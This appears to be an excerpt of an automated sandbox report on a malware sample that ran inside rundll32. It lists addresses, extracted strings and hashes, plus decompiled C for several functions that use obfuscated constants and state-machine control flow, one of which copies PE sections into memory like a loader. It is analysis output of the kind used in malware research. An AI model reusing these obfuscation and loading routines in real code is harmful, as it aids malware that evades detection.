0x001aeb1c
0x001aeb29
0x001aeb2d
0x001aeb32
0x001aeb3a
0x001aeb42
0x001aeb4a
0x001aeb4f
0x001aeb57
0x001aeb5c
0x001aeb64
0x001aeb64
0x001aeb76
0x001aec04
0x001aec26
0x001aec2b
0x001aec2e
0x00000000
0x001aeb7c
0x001aeb7c
0x001aeb7e
0x001aeb84
0x001aeb8d
0x001aebdc
0x001aebf2
0x001aebf7
0x001aebfa
0x00000000
0x001aebfa
0x001aeb7e
0x00000000
0x001aeb76
0x001aec35
0x001aec40
0x001aec44
0x001aec45
0x001aec49
0x001aec4a
0x001aec52
0x001aec53
0x001aec54
0x001aec5b
0x001aec5f
0x001aec61
0x001aec64
0x001aec69
0x001aec69
0x001aec69
0x001aec81

Strings

ar-KW, xrefs: 001AEBC5, 001AEBCF
L, xrefs: 001AEA0D
z, xrefs: 001AEB1C
20, xrefs: 001AEAF2
4|j5, xrefs: 001AEA27
f, xrefs: 001AEB02
:`, xrefs: 001AE97A

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 20$4|j5$L$ar-KW$:`$f$z
API String ID: 0-733589890
Opcode ID: 510e2a2bba6ac0afbb9f96494073cf982ecefdceb34a80692fa2347351d57176
Instruction ID: 3bfaa595cdbcdd9c73e01980ccfed627a4a6b84f89c133edea4ba2e102849248
Opcode Fuzzy Hash: 510e2a2bba6ac0afbb9f96494073cf982ecefdceb34a80692fa2347351d57176
Instruction Fuzzy Hash: A9A12FB15083819FE354CF65C88945BFBF1FBC5798F508A1CF19686260C7B68A59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 001A4DB8, Relevance: 8.9, Strings: 7, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E001A4DB8(void* __ecx, void* __edx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t183;
				void* _t201;
				void* _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t220;
				void* _t253;
				void* _t256;
				void* _t260;
				signed int* _t263;
				signed int* _t264;
				signed int* _t265;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(3);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t183);
				_v40 = 0x30ee;
				_v40 = _v40 + 0xce3d;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x00001003;
				_v28 = 0x367f;
				_t214 = 0x4f;
				_v28 = _v28 / _t214;
				_v28 = _v28 + 0xe7c6;
				_v28 = _v28 ^ 0x00006876;
				_v12 = 0x9b15;
				_v12 = _v12 + 0xffffd016;
				_v12 = _v12 ^ 0x00004b2b;
				_v48 = 0x1065;
				_v48 = _v48 + 0xffffdfe8;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 ^ 0x000f8679;
				_v68 = 0x1d00;
				_t215 = 5;
				_v68 = _v68 / _t215;
				_t216 = 0xb;
				_v68 = _v68 * 0x46;
				_v68 = _v68 + 0x3dbf;
				_v68 = _v68 ^ 0x000193af;
				_v52 = 0x69aa;
				_v52 = _v52 << 6;
				_v52 = _v52 * 0x2f;
				_v52 = _v52 ^ 0x04d9f716;
				_v72 = 0xc27e;
				_v72 = _v72 / _t216;
				_t217 = 0x1a;
				_v72 = _v72 / _t217;
				_v72 = _v72 >> 0xb;
				_v72 = _v72 ^ 0x00005e66;
				_v64 = 0xd656;
				_v64 = _v64 << 6;
				_v64 = _v64 >> 2;
				_t218 = 0x6e;
				_v64 = _v64 / _t218;
				_v64 = _v64 ^ 0x00000c6b;
				_v16 = 0xae5b;
				_t219 = 0x3b;
				_v16 = _v16 / _t219;
				_v16 = _v16 ^ 0x000076a2;
				_v20 = 0x1039;
				_v20 = _v20 | 0x82266672;
				_v20 = _v20 ^ 0x82265208;
				_v24 = 0x8f4e;
				_v24 = _v24 + 0x14fa;
				_v24 = _v24 ^ 0x0000f100;
				_v60 = 0x9e8d;
				_v60 = _v60 + 0xffff079d;
				_t220 = _a12;
				_v60 = _v60 * 0x44;
				_v60 = _v60 << 2;
				_v60 = _v60 ^ 0xffa0d289;
				_v8 = 0xa83d;
				_v8 = _v8 ^ 0xd1fece0e;
				_v8 = _v8 ^ 0xd1fe7b06;
				_v56 = 0xdaa;
				_v56 = _v56 + 0xd60;
				_v56 = _v56 | 0x6744239d;
				_v56 = _v56 * 0x18;
				_v56 = _v56 ^ 0xae65cea3;
				_v4 = 0x612f;
				_v4 = _v4 + 0xffffdc20;
				_v4 = _v4 ^ 0x000072d4;
				_v32 = 0xc2c2;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0xd029cfc4;
				_v32 = _v32 ^ 0xd029926f;
				_v36 = 0xc1df;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x9860b233;
				_v36 = _v36 ^ 0x9878f6e4;
				_v44 = 0x7d22;
				_v44 = _v44 + 0xffff6b70;
				_v44 = _v44 + 0xad25;
				_v44 = _v44 ^ 0x000095f7;
				_t201 = E001AD500(_t220, _v48, _a8, _v68, _v52, _v72);
				_t212 = _t201;
				_t263 =  &(( &_v72)[0xa]);
				if(_t212 == 0) {
					return _t201;
				}
				_push(_t220);
				_t256 = E001B78F6(_v12 | _v40, _v64, _v16,  *((intOrPtr*)(_t212 + 0x50)), _v20, _v44, _v24);
				_t264 =  &(_t263[6]);
				if(_t256 == 0) {
					L7:
					return _t256;
				}
				E001A5C9F(_v60, _a12,  *((intOrPtr*)(_t212 + 0x54)), _t256, _v8);
				_t265 =  &(_t264[3]);
				_t253 = ( *(_t212 + 0x14) & 0x0000ffff) + 0x18 + _t212;
				_t260 = ( *(_t212 + 6) & 0x0000ffff) * 0x28 + _t253;
				while(_t253 < _t260) {
					_t207 =  <  ?  *((void*)(_t253 + 8)) :  *((intOrPtr*)(_t253 + 0x10));
					E001A5C9F(_v56,  *((intOrPtr*)(_t253 + 0x14)) + _a12,  <  ?  *((void*)(_t253 + 8)) :  *((intOrPtr*)(_t253 + 0x10)),  *((intOrPtr*)(_t253 + 0xc)) + _t256, _v4);
					_t265 =  &(_t265[3]);
					_t253 = _t253 + 0x28;
				}
				E001A4C43(_t256, _t212);
				if(E001A7D94(_t256, _t212) == 0) {
					E001AE272(_t256, _v28, _v32, _v36);
					_t256 = 0;
				}
				goto L7;
			}

0x001a4dbc
0x001a4dc0
0x001a4dc4
0x001a4dc8
0x001a4dca
0x001a4dcb
0x001a4dcc
0x001a4dd1
0x001a4ddb
0x001a4de3
0x001a4de8
0x001a4df0
0x001a4dfe
0x001a4e03
0x001a4e09
0x001a4e11
0x001a4e19
0x001a4e21
0x001a4e29
0x001a4e31
0x001a4e39
0x001a4e41
0x001a4e46
0x001a4e4e
0x001a4e5a
0x001a4e5f
0x001a4e6a
0x001a4e6d
0x001a4e71
0x001a4e79
0x001a4e81
0x001a4e89
0x001a4e93
0x001a4e97
0x001a4e9f
0x001a4eaf
0x001a4eb7
0x001a4ebc
0x001a4ec2
0x001a4ec7
0x001a4ecf
0x001a4ed7
0x001a4edc
0x001a4ee5
0x001a4eea
0x001a4ef0
0x001a4ef8
0x001a4f04
0x001a4f07
0x001a4f0b
0x001a4f13
0x001a4f1b
0x001a4f23
0x001a4f2b
0x001a4f33
0x001a4f3b
0x001a4f43
0x001a4f4b
0x001a4f58
0x001a4f5c
0x001a4f60
0x001a4f65
0x001a4f6d
0x001a4f75
0x001a4f7d
0x001a4f85
0x001a4f8d
0x001a4f95
0x001a4fa2
0x001a4fa6
0x001a4fae
0x001a4fb6
0x001a4fbe
0x001a4fc6
0x001a4fce
0x001a4fd3
0x001a4fdb
0x001a4fe3
0x001a4feb
0x001a4ff0
0x001a4ff8
0x001a5000
0x001a5008
0x001a5010
0x001a5018
0x001a5034
0x001a5039
0x001a503b
0x001a5040
0x001a510d
0x001a510d
0x001a5047
0x001a506c
0x001a506e
0x001a5073
0x001a5106
0x00000000
0x001a5108
0x001a508b
0x001a5094
0x001a50a1
0x001a50a3
0x001a50d2
0x001a50be
0x001a50c7
0x001a50cc
0x001a50cf
0x001a50cf
0x001a50da
0x001a50ec
0x001a50fc
0x001a5104
0x001a5104
0x00000000

Strings

/a, xrefs: 001A4FAE
+K, xrefs: 001A4E29
"}, xrefs: 001A5000
f^, xrefs: 001A4EC7
0, xrefs: 001A4DD1
`, xrefs: 001A4F8D
vh, xrefs: 001A4E11

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "}$+K$/a$`$f^$vh$0
API String ID: 0-789538697
Opcode ID: 6461e2e36c7c382556c063156dea47837cffb8cab63ff3ab713ebe1541a6c8c4
Instruction ID: 9c9dce755ad340acd2f59fb62247a59d76ff90a9cecf7dde7acc3a8bdcf4f60f
Opcode Fuzzy Hash: 6461e2e36c7c382556c063156dea47837cffb8cab63ff3ab713ebe1541a6c8c4
Instruction Fuzzy Hash: A69144726083409FD358CFA5C98980BFBF2BBC9758F108A1DF195962A0D3B9DA55CF42

Uniqueness

Uniqueness Score: -1.00%

Function 001B96EA, Relevance: 8.9, Strings: 7, Instructions: 158
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E001B96EA(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t134;
				void* _t148;
				intOrPtr _t151;
				void* _t156;
				signed int _t167;
				signed int _t168;
				void* _t170;
				signed int* _t173;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(1);
				_push(_a4);
				_push(1);
				_push(__ecx);
				E001AD571(_t134);
				_v32 = 0xa90;
				_t173 =  &(( &_v56)[8]);
				_v32 = _v32 ^ 0x5a78797d;
				_v32 = _v32 << 0xc;
				_t170 = 0;
				_v32 = _v32 ^ 0x873ef055;
				_t156 = 0x1309d555;
				_v8 = 0x83dc;
				_v8 = _v8 + 0xf6a3;
				_v8 = _v8 ^ 0x00010932;
				_v52 = 0x117;
				_v52 = _v52 >> 0xd;
				_t167 = 0x19;
				_v52 = _v52 / _t167;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x000065d1;
				_v56 = 0xdf3b;
				_v56 = _v56 << 0x10;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x0d6c932b;
				_v56 = _v56 ^ 0xe16ce70e;
				_v20 = 0xfb4d;
				_v20 = _v20 + 0x65d2;
				_v20 = _v20 | 0x70480adf;
				_v20 = _v20 ^ 0x7049567e;
				_v44 = 0xdc55;
				_v44 = _v44 >> 1;
				_v44 = _v44 ^ 0x202d7d54;
				_v44 = _v44 + 0x4b1d;
				_v44 = _v44 ^ 0x202d43d3;
				_v24 = 0x2d7e;
				_v24 = _v24 << 0xe;
				_t168 = 0x69;
				_v24 = _v24 * 0x53;
				_v24 = _v24 ^ 0xaff6d2d8;
				_v48 = 0xa367;
				_v48 = _v48 * 0x41;
				_v48 = _v48 >> 7;
				_v48 = _v48 + 0xba74;
				_v48 = _v48 ^ 0x00016ffb;
				_v28 = 0x1a59;
				_v28 = _v28 + 0xffffa465;
				_v28 = _v28 / _t168;
				_v28 = _v28 ^ 0x027042fd;
				_v36 = 0xc361;
				_v36 = _v36 * 0x64;
				_v36 = _v36 >> 4;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x0000774a;
				_v40 = 0xfafe;
				_v40 = _v40 * 0x26;
				_v40 = _v40 ^ 0x6e9b26fb;
				_v40 = _v40 ^ 0x7c82e7d8;
				_v40 = _v40 ^ 0x123cb693;
				_v12 = 0xb317;
				_v12 = _v12 * 0x69;
				_v12 = _v12 + 0xffff464a;
				_v12 = _v12 ^ 0x00489ad9;
				_v16 = 0xb75d;
				_v16 = _v16 * 0x44;
				_v16 = _v16 ^ 0x974e34a4;
				_v16 = _v16 ^ 0x977ecfc3;
				_t169 = _v4;
				do {
					while(_t156 != 0x764e013) {
						if(_t156 == 0x1309d555) {
							_t156 = 0x2721d6b9;
							continue;
						} else {
							if(_t156 == 0x263f2319) {
								_t148 = E001B115A(_v8, _t169,  &_v4, _v52, _v56);
								_t173 =  &(_t173[3]);
								if(_t148 != 0) {
									_t156 = 0x764e013;
									continue;
								}
							} else {
								if(_t156 == 0x2721d6b9) {
									_t151 = E001A61E7();
									_t169 = _t151;
									if(_t151 != 0xffffffff) {
										_t156 = 0x263f2319;
										continue;
									}
								} else {
									if(_t156 != 0x335f0a5e) {
										goto L14;
									} else {
										E001B01E5(_v36, _v12, _v4, _v16);
									}
								}
							}
						}
						L7:
						return _t170;
					}
					E001B7C93(_v4, 1, _t156, _v20, _v44, 1, _a20, _v24, _a4, _v48, _v28);
					_t173 =  &(_t173[9]);
					_t156 = 0x335f0a5e;
					_t170 =  !=  ? 1 : _t170;
					L14:
				} while (_t156 != 0x2e1c6412);
				goto L7;
			}

0x001b96f1
0x001b96f7
0x001b96fc
0x001b9700
0x001b9704
0x001b9705
0x001b9709
0x001b970a
0x001b970b
0x001b9710
0x001b9718
0x001b971b
0x001b9725
0x001b972a
0x001b972c
0x001b9734
0x001b9739
0x001b9741
0x001b9749
0x001b9751
0x001b9759
0x001b9764
0x001b9769
0x001b976f
0x001b9774
0x001b977c
0x001b9784
0x001b9789
0x001b978e
0x001b9796
0x001b979e
0x001b97a6
0x001b97ae
0x001b97b6
0x001b97be
0x001b97c6
0x001b97ca
0x001b97d2
0x001b97da
0x001b97e2
0x001b97ea
0x001b97f4
0x001b97f5
0x001b97f9
0x001b9801
0x001b980e
0x001b9812
0x001b9817
0x001b981f
0x001b9827
0x001b982f
0x001b983d
0x001b9841
0x001b9849
0x001b9856
0x001b985a
0x001b985f
0x001b9864
0x001b986c
0x001b9879
0x001b987d
0x001b9885
0x001b988d
0x001b9895
0x001b98a7
0x001b98ab
0x001b98b3
0x001b98bb
0x001b98c8
0x001b98cc
0x001b98d4
0x001b98dc
0x001b98e0
0x001b98e0
0x001b98ee
0x001b996f
0x00000000
0x001b98f0
0x001b98f6
0x001b995c
0x001b9961
0x001b9966
0x001b9968
0x00000000
0x001b9968
0x001b98f8
0x001b98fe
0x001b9936
0x001b993b
0x001b9940
0x001b9942
0x00000000
0x001b9942
0x001b9900
0x001b9906
0x00000000
0x001b990c
0x001b9920
0x001b9925
0x001b9906
0x001b98fe
0x001b98f6
0x001b9929
0x001b9931
0x001b9931
0x001b999d
0x001b99a2
0x001b99a5
0x001b99ac
0x001b99af
0x001b99af
0x00000000

Strings

~VIp, xrefs: 001B97B6
^_3, xrefs: 001B9900
}yxZ, xrefs: 001B971B
^_3, xrefs: 001B99A5
~-, xrefs: 001B97E2
Jw, xrefs: 001B9864
T}- , xrefs: 001B97CA

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Jw$T}- $^_3$^_3$}yxZ$~-$~VIp
API String ID: 0-116321829
Opcode ID: dd4213e2bda162dbe77b556eafa718d8edb40a8e2b2e0097d497e4789ddfd29e
Instruction ID: c50aee6be03b0bb33819096688b02cb26d68b5296bc990c6491649896e1a38e6
Opcode Fuzzy Hash: dd4213e2bda162dbe77b556eafa718d8edb40a8e2b2e0097d497e4789ddfd29e
Instruction Fuzzy Hash: C57142B1508345AFD358CF61C88941FBBE2FBD8798F501A1DF18696260D3B5CA59CB43

Uniqueness

Uniqueness Score: -1.00%

Function 001A75A0, Relevance: 8.9, Strings: 7, Instructions: 139
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001A75A0(signed int __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _t143;
				signed int _t149;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr _t171;
				void* _t176;
				void* _t177;

				_t151 = __ecx;
				_t169 =  *0x10020718;
				while(_t169 != 0) {
					if( *((intOrPtr*)(_t169 + 0x2c)) != 0) {
						 *((intOrPtr*)(_t169 + 0x18))( *((intOrPtr*)(_t169 + 0x2c)), 0xb, 0);
					}
					_t169 =  *((intOrPtr*)(_t169 + 8));
				}
				_t152 = _t151 | 0xffffffff;
				_pop(_t170);
				_t177 = _t176 - 0x40;
				_v8 = 0x579660;
				_t149 = _t152;
				_v4 = 0;
				_v32 = 0x7f0a;
				_v32 = _v32 | 0x793e3d56;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x3c9f3f0b;
				_v36 = 0x1a5f;
				_v36 = _v36 + 0xffff6044;
				_v36 = _v36 | 0x092639e6;
				_v36 = _v36 ^ 0xffff6a93;
				_v40 = 0x95b8;
				_v40 = _v40 | 0xfd2e4967;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0xf4bb02ee;
				_v24 = 0x4086;
				_v24 = _v24 + 0x3345;
				_v24 = _v24 >> 9;
				_v24 = _v24 ^ 0x00005a1a;
				_v56 = 0x44d;
				_v56 = _v56 + 0xffffb36e;
				_v56 = _v56 ^ 0x60c6cbbe;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 ^ 0x0000bdbf;
				_v60 = 0xd3f6;
				_v60 = _v60 << 5;
				_v60 = _v60 ^ 0xfc6fca2a;
				_v60 = _v60 | 0x2e6107a2;
				_v60 = _v60 ^ 0xfe75905f;
				_v28 = 0x6470;
				_v28 = _v28 + 0xffffc1f7;
				_v28 = _v28 << 7;
				_v28 = _v28 ^ 0x0013310e;
				_v48 = 0x7409;
				_v48 = _v48 + 0xffff4b7b;
				_v48 = _v48 << 0xc;
				_v48 = _v48 | 0x981dd878;
				_v48 = _v48 ^ 0xfbfd8bf9;
				_v20 = 0xa0e9;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x5c378e95;
				_v20 = _v20 ^ 0x5c37a2fa;
				_v52 = 0x7f3;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0xae5e1891;
				_v52 = _v52 ^ 0xb63863b5;
				_v52 = _v52 ^ 0x1861d611;
				_v16 = 0x3d46;
				_v16 = _v16 ^ 0x87280f4f;
				_v16 = _v16 ^ 0x87281a0f;
				_v12 = 0xdfd9;
				_t153 = 0x6a;
				_v12 = _v12 * 0x19;
				_t166 = 0x10020718;
				_v12 = _v12 ^ 0x0015c1ec;
				_v44 = 0x5d3;
				_v44 = _v44 << 0x10;
				_v44 = _v44 / _t153;
				_v44 = _v44 + 0xffff869c;
				_v44 = _v44 ^ 0x000d9538;
				_v64 = 0xeccd;
				_v64 = _v64 + 0xffff8c78;
				_v64 = _v64 | 0xa77a13b4;
				_v64 = _v64 + 0x75e;
				_v64 = _v64 ^ 0xa77a8353;
				_t171 =  *0x10020718;
				while(_t171 != 0) {
					if( *((intOrPtr*)(_t171 + 0x2c)) == 0) {
						L10:
						 *_t166 =  *((intOrPtr*)(_t171 + 8));
						_t143 = E001AE380(_v12, _t171, _v44);
					} else {
						_t143 = E001A2ED2(_v32,  *((intOrPtr*)(_t171 + 0x14)), _t149, _v36, _v40);
						_t177 = _t177 + 0xc;
						if(_t143 != _v64) {
							_t166 = _t171 + 8;
						} else {
							 *((intOrPtr*)(_t171 + 0x18))( *((intOrPtr*)(_t171 + 0x2c)), 0, 0);
							E001A693A(_v36, _v68,  *((intOrPtr*)(_t171 + 0x2c)), _v72, _v40);
							E001B01E5(_v60, _v64,  *((intOrPtr*)(_t171 + 0x14)), _v28);
							_t177 = _t177 + 0x18;
							goto L10;
						}
					}
					_t171 =  *_t166;
				}
				return _t143;
			}

0x001a75a0
0x001a75a1
0x001a75bc
0x001a75ad
0x001a75b6
0x001a75b6
0x001a75b9
0x001a75b9
0x001a75c0
0x001a75c3
0x001b1549
0x001b154c
0x001b155a
0x001b155c
0x001b1560
0x001b1568
0x001b1570
0x001b1574
0x001b157c
0x001b1584
0x001b158c
0x001b1594
0x001b159c
0x001b15a4
0x001b15ac
0x001b15b1
0x001b15b9
0x001b15c1
0x001b15c9
0x001b15ce
0x001b15d6
0x001b15de
0x001b15e6
0x001b15ee
0x001b15f3
0x001b15fb
0x001b1603
0x001b1608
0x001b1610
0x001b1618
0x001b1620
0x001b1628
0x001b1630
0x001b1635
0x001b163d
0x001b1645
0x001b164d
0x001b1652
0x001b165a
0x001b1662
0x001b166a
0x001b166f
0x001b1677
0x001b167f
0x001b1687
0x001b168c
0x001b1694
0x001b169c
0x001b16a4
0x001b16ac
0x001b16b4
0x001b16bc
0x001b16cd
0x001b16ce
0x001b16d2
0x001b16d7
0x001b16df
0x001b16e7
0x001b16f2
0x001b16f6
0x001b16fe
0x001b1706
0x001b170e
0x001b1716
0x001b171e
0x001b1726
0x001b172e
0x001b17ab
0x001b1739
0x001b1794
0x001b17a1
0x001b17a3
0x001b173b
0x001b174b
0x001b1750
0x001b1757
0x001b17b7
0x001b1759
0x001b175e
0x001b1774
0x001b178c
0x001b1791
0x00000000
0x001b1791
0x001b1757
0x001b17a9
0x001b17a9
0x001b17b6

Strings

9&, xrefs: 001B158C
V=>y, xrefs: 001B1568
pd, xrefs: 001B1620
es-EC, xrefs: 001A75A1, 001B16D2, 001B172E
t, xrefs: 001B163D
F=, xrefs: 001B16A4
E3, xrefs: 001B15C1

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: t$E3$F=$V=>y$es-EC$pd$9&
API String ID: 0-2037588340
Opcode ID: 7b1b43750f414616fa8ba35ee7131fe5489b674ebb0ca599104558fd2077476f
Instruction ID: b3759a9fafbf093e858971e88efdca06ccdce6aa86e13c29b52963421db130e9
Opcode Fuzzy Hash: 7b1b43750f414616fa8ba35ee7131fe5489b674ebb0ca599104558fd2077476f
Instruction Fuzzy Hash: F1612172408341AFD3A5CF25C98940BBBF1FB98758F504E1CF5DA622A0C3B59A49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 001A367A, Relevance: 8.9, Strings: 7, Instructions: 134
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E001A367A() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _t123;
				intOrPtr _t124;
				signed int _t128;
				signed int _t129;
				intOrPtr _t130;
				void* _t140;
				signed int* _t142;

				_t142 =  &_v56;
				_v4 = _v4 & 0x00000000;
				_v8 = 0x7a10b6;
				_v40 = 0xd47c;
				_v40 = _v40 ^ 0xc9c15fd8;
				_t128 = 0x17;
				_v40 = _v40 / _t128;
				_v40 = _v40 ^ 0x08c597d1;
				_t140 = 0x1cacda0c;
				_v16 = 0x5e58;
				_t129 = 0x57;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0x0013fcf5;
				_v44 = 0x66ed;
				_v44 = _v44 * 0x61;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x04dff070;
				_v20 = 0x5c2b;
				_v20 = _v20 * 0x67;
				_v20 = _v20 ^ 0x00257697;
				_v24 = 0x4ab9;
				_v24 = _v24 ^ 0x3f11ade3;
				_v24 = _v24 ^ 0x3f11c8b2;
				_v56 = 0x5d4f;
				_v56 = _v56 + 0x4a0c;
				_v56 = _v56 << 1;
				_v56 = _v56 ^ 0x00014480;
				_v48 = 0x2489;
				_v48 = _v48 * 0x33;
				_v48 = _v48 ^ 0x539286e1;
				_v48 = _v48 ^ 0x5395d040;
				_v28 = 0x961f;
				_v28 = _v28 + 0x767b;
				_v28 = _v28 + 0x6868;
				_v28 = _v28 ^ 0x00011112;
				_v32 = 0x354a;
				_v32 = _v32 ^ 0x6ae76b29;
				_v32 = _v32 | 0x68b8a72b;
				_v32 = _v32 ^ 0x6afffcbe;
				_v52 = 0xb360;
				_v52 = _v52 + 0x3451;
				_v52 = _v52 / _t129;
				_v52 = _v52 | 0xaa821ec8;
				_v52 = _v52 ^ 0xaa82629d;
				_v12 = 0x5a5f;
				_v12 = _v12 + 0xffff6d93;
				_v12 = _v12 ^ 0xfffffcd5;
				_v36 = 0xf584;
				_v36 = _v36 | 0xbd617d7d;
				_v36 = _v36 * 0x31;
				_v36 = _v36 ^ 0x3fc1ce7b;
				_t130 =  *0x10020714;
				do {
					while(_t140 != 0x1cacda0c) {
						if(_t140 == 0x260b3ab0) {
							_t123 = E001AC9AA(_v24, _v56, _t130, _v48);
							_t130 =  *0x10020714;
							_t142 = _t142 - 0xc + 0x14;
							_t140 = 0x334b8e8f;
							 *((intOrPtr*)(_t130 + 0x24)) = _t123;
							continue;
						} else {
							if(_t140 != 0x334b8e8f) {
								goto L10;
							} else {
								_t124 = E001AFA3C(_v28, _v32, _t130, _v52, 0x10018e79, _v12, _t130, 0, _t130, _t130, _v36);
								_t130 =  *0x10020714;
								 *((intOrPtr*)(_t130 + 0xc)) = _t124;
							}
						}
						L5:
						return 0 | _t130 != 0x00000000;
					}
					_push(_t130);
					_push(_t130);
					_t130 = E001B922B(0x40);
					_t142 =  &(_t142[3]);
					 *0x10020714 = _t130;
					if(_t130 == 0) {
						_t140 = 0x2ed782eb;
						goto L10;
					} else {
						_t140 = 0x260b3ab0;
						continue;
					}
					goto L5;
					L10:
				} while (_t140 != 0x2ed782eb);
				goto L5;
			}

0x001a367a
0x001a367d
0x001a3684
0x001a368c
0x001a3694
0x001a36a6
0x001a36ab
0x001a36b1
0x001a36b9
0x001a36be
0x001a36d5
0x001a36db
0x001a36df
0x001a36e7
0x001a36f4
0x001a36f8
0x001a36fd
0x001a3705
0x001a3712
0x001a3716
0x001a371e
0x001a3726
0x001a372e
0x001a3736
0x001a3746
0x001a374e
0x001a3752
0x001a375a
0x001a3767
0x001a376b
0x001a3773
0x001a377b
0x001a3783
0x001a378b
0x001a3793
0x001a379b
0x001a37a3
0x001a37ab
0x001a37b3
0x001a37bb
0x001a37c3
0x001a37d1
0x001a37d5
0x001a37dd
0x001a37e5
0x001a37ed
0x001a37f5
0x001a37fd
0x001a3805
0x001a3812
0x001a3816
0x001a381e
0x001a3824
0x001a3824
0x001a382e
0x001a3887
0x001a388c
0x001a3892
0x001a3895
0x001a3897
0x00000000
0x001a3830
0x001a3832
0x00000000
0x001a3838
0x001a3857
0x001a385c
0x001a3865
0x001a3865
0x001a3832
0x001a3869
0x001a3876
0x001a3876
0x001a38ac
0x001a38ad
0x001a38b5
0x001a38b7
0x001a38ba
0x001a38c2
0x001a38cb
0x00000000
0x001a38c4
0x001a38c4
0x00000000
0x001a38c4
0x00000000
0x001a38cd
0x001a38cd
0x00000000

Strings

_Z, xrefs: 001A37E5
Q4, xrefs: 001A37C3
hh, xrefs: 001A378B
+\, xrefs: 001A3705
O], xrefs: 001A3736
)kj, xrefs: 001A37A3
f, xrefs: 001A36E7

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )kj$+\$O]$Q4$_Z$hh$f
API String ID: 0-1207614839
Opcode ID: ade015ae09c36ffb3688ddc20d57e637bb2c097e9389b75e062ef95baad5f206
Instruction ID: c9ca17fa8df32af68567c714f2628d1646705ce4436c91f55ab131e8263a5b5c
